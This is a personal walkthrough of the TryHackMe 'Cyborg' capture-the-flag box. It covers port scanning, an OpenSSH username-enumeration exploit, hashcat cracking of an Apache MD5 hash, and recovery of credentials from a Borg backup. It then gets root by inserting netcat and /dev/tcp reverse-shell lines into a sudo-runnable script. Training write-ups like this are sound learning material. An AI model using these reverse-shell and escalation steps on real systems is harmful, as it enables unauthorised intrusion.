This is a writeup documenting my process going through the Cyborg box on TryHackMe. As always we are given an ip address with the goal of submitting the user flag and the root flag. There were a few rabbit holes I dove into in this one but in the end we achieved control.
Given an ip address of, let’s perform an nmap
scan to find open ports.
Nmap #Nmap
- looks like we need to slow down our scan
- and scanning for all ports is way too slow
- let’s narrow down our port search
- ok we didn’t get any new info compared to the last scan but in the top 1000 ports it looks like only port 22 and 80 are open.
Port 80 #http
Looks like http is open on port 80 so let’s give our target a visit.
the default Apache2 page is up
- Let’s do a little more
enumeration to find version numbers –>nmap -vv -A -p 80
- Apache httpd 2.4.18
- uhhh looks like we don’t need a directory brute forcer because /admin is just open for us.
Going to the Admins page we see,
- config files laying about
- music_archive file
- there is no scrollbar but scrolling to the left shows just the end of the sentence and nothing more
- do the hashtags mean anything?
From the main /admin page we can click on Archive which will give us a .tar file download.
- .tar file is a file that collects many files into one archive file for distribution or backup purposes
Upon trying to open the file with mousepad we see this,
- when catting the file we do not get this info
- is this id and key important information?
Port 22 #ssh
While we mull over our findings let’s try and glean some info from ssh on port 22.
- ok ssh is confirmed open
- once we guess a password we are moving onto the exploitation phase so best not to yet
–> nmap -vv -A -p 22
- we glean the version info
- and the ssh-hostkey info, is this normal?
- looks like this ssh is using RSA which is a type of asymmetric cryptography meaning the public key visibility is totally normal
- OpenSSH 7.2 has an exploit on Exploit-DB
Scrappy enumeration
Now that we have done some basic enumeration, let’s follow up on that .tar file we downloaded.
tar -ztvf
is attempting to list the contents of the .tar filetar -xvzf
is attempting to unzip the .tar file
The problem we are running into is that both .tar and .tar.gz endings seem to not be the right formatting.
- viewing the /admin page source further we seem to find a few hashes
- potential code for an ssh exploit
shows us an exploit for our openSSH version
SSH Exploitation #Metasploit
The Exploit-DB exploits are in the directory /usr/share/exploitdb/exploits
. We copy the exploit into our folder of choice.
- ok to run this command we specify the user or userlist and then the host
- why is there an error in the exploit?
- great
- well we can change this easily enough in our script
- this OpenSSH timing attack is based on invalid and valid usernames having different response times for authentication
- the timing for the username Alex indicates that is probably not a user
Directory busting #gobuster
We’ve kind of hit a roadblock with SSH and we shouldn’t assume that /admin is the only directory on port 80. Let’s do a gobuster
scan and try to tackle the webpage on port 80
- some interesting directories besides /admin
- /etc shows us a directory on the server
- a file in the /etc directory gives us a password and the term music_archive shows up again
- using the
tool we find that the password is a possible MD5(APR) hash.
- the other file on the webserver
We can possibly use #hashcat to crack the hash, we have a lot of other information that we have gathered as well like the sha384 and 512 hashes in the source code but I’m not sure how to use it.
Doing some research on md5(APR) it looks to be an md5 hash specifically for Apache web servers,
- the password we found on our webserver fits this format
Entering hashcat -h | grep apr
we see,
- 1600 is the mode so we need to run (
-m 1600
) to let the program know we are attacking this specific hash
Running, hashcat -m 1600 justthepasswd.txt /usr/share/wordlists/rockyou.txt
we are told, ”* Device #1: Not enough allocatable device memory for this attack.” which is unfortunate. Even the -O
flag which should optimize this process does not help us.
Doubling our VM’s allocated memory and running the same command we crack the hash in about 10 seconds,
- hash cracked
Borg Backup #borg
Somewhere somehow we managed to extract the archive.tar
- the contents of
- what is a Borg Backup repo?
Visiting the documentation page we are told that Borg is a backup program with the purpose of compressing or encrypting files. We will need to install the borgbackup
package to use it in the command line.
After some trouble with the install (needed to update the apt-get
command) we acquire borg
- the command seems to be working as intended
Going back to the borg documentation it seems the option we need is borg info,
- we need to run the command
borg info .
(. specifies the folder we are in)
- and we are prompted with a password
- let’s try the only password we know which is
- interesting, not sure this is what I wanted
- maybe we run a different
What about borg extract? I thought the files were already extracted from the archive but then why would would the “extracted” files lead us to the borg documentation?
- after finally getting the syntax correct we are prompted with the password again
- this wasn’t here before…
- a secret file?
- is this what we’ve been searching for?
- nope
- we still have a lot of folders to look in though
- the four-billionth password we have seen
- there is nothing else in any of the other folders
- the only place i can think of to use this password is OpenSSH
OpenSSH login #ssh
Let’s attempt to login with the credentials we found,
- the username is valid….
- lets go!
- no need for any fancy ssh exploitation we’re in
- we got the user flag!
Privilege Escalation #privesc
We have user access to ssh so let’s poke around our new domain and try and find some clues. Let’s start with the ssh config file?
- two config files and a lot of key files
- what is the difference between
- hmmm I think the server config is what we should focus on
- we tried :/
Reading up on ssh privilege escalation we learn that there is two ways to exploit SSH keys, 1) Reading private keys 2) Writing to public keys
The 1st option allows you to authenticate to the server as the root user and the 2nd option allows you to create your own key, bypassing the security check.
- we do not have privileges for reading private keys or writing to public keys
Upon finishing my final exams for the semester I realize we should do enumeration for the privilege escalation phase as well.
- #commands
Starting of with the id
- the groups we belong to is interesting specifically
but I’m not sure what do do with this information
The sudo-l
command catches my eye,
- we seem to have access to a script
sudo find / -name "*.mp3" | sudo tee /etc/mp3backups/backed_up_files.txt
#while IFS= read -r line
# b=$(basename $input)
# echo "$line"
#done < "$input"
while getopts c: flag
case "${flag}" in
c) command=${OPTARG};;
backup_files="/home/alex/Music/song1.mp3 /home/alex/Music/song2.mp3 /home/alex/Music/song3.mp3 /home/alex/Music/song4.mp3 /home/alex/Music/song5.mp3 /home/alex/Music/song6.mp3 /home/alex/Music/song7.mp3 /home/alex/Music/song8.mp3 /home/alex/Music/song9.mp3 /home/alex/Music/song10.mp3 /home/alex/Music/song11.mp3 /home/alex/Music/song12.mp3"
# Where to backup to.
# Create archive filename.
hostname=$(hostname -s)
# Print start status message.
echo "Backing up $backup_files to $dest/$archive_file"
# Backup the files using tar.
tar czf $dest/$archive_file $backup_files
# Print end status message.
echo "Backup finished"
echo $cmd
- my initial thoughts are that this is simply for the creation of the tar archive that we already decrypted
However the part that matters to us is not the content but the fact that this script can be run as the root user and we have access to it. This will hopefully allow us to create a reverse shell.
Unfortunately we are not allowed to write to the script but since we should be the owners of the script lets try giving ourselves the permissions with chmod +w etc/mp3backups/
- we gave ourselves the access let’s try setting up the reverse shell now
Ok script changing editing works! Let’s setup a shell now,
nc 5555 -e /bin/bash
- we set up the listener on our attacker machine with
nc -lvnp 5555
and the shell on the target machine with the script
Running the script with ./
we meet this error,
nc: invalid option -- 'e'
This is nc from the netcat-openbsd package. An alternative nc is available
in the netcat-traditional package.
usage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length]
[-P proxy_username] [-p source_port] [-q seconds] [-s source]
[-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]
[-x proxy_address[:port]] [destination] [port]
- apparently ubuntu which is the host machine operating system has 2 packages, netcat and ncat which make using the
flag complicated
Let’s pick up a basic bash shell from then,
sh -i >& /dev/tcp/ 0>&1
- the updated script
We have a connection!
- nevermind we are still the same user
The problem we are having is that the alex user is the one executing the script which means the reverse shell will be with his privileges. For root access we need root to run the script.
The only way I can think of to find a script running by root is through a cronjob. Let’s examine the scheduled cronjobs then,
- the available cronjobs will not allow us to edit them
- even the daily cronjobs will not give us write access
Wait hold up, the whole purpose of enumerating with sudo -l
was to find files we can execute as root but when executing the
file we never used sudo! Let’s use that bash reverse shell, set up our listener and run sudo ./
this time.
- Voila! we are root
Let’s capture our flag,
- EZ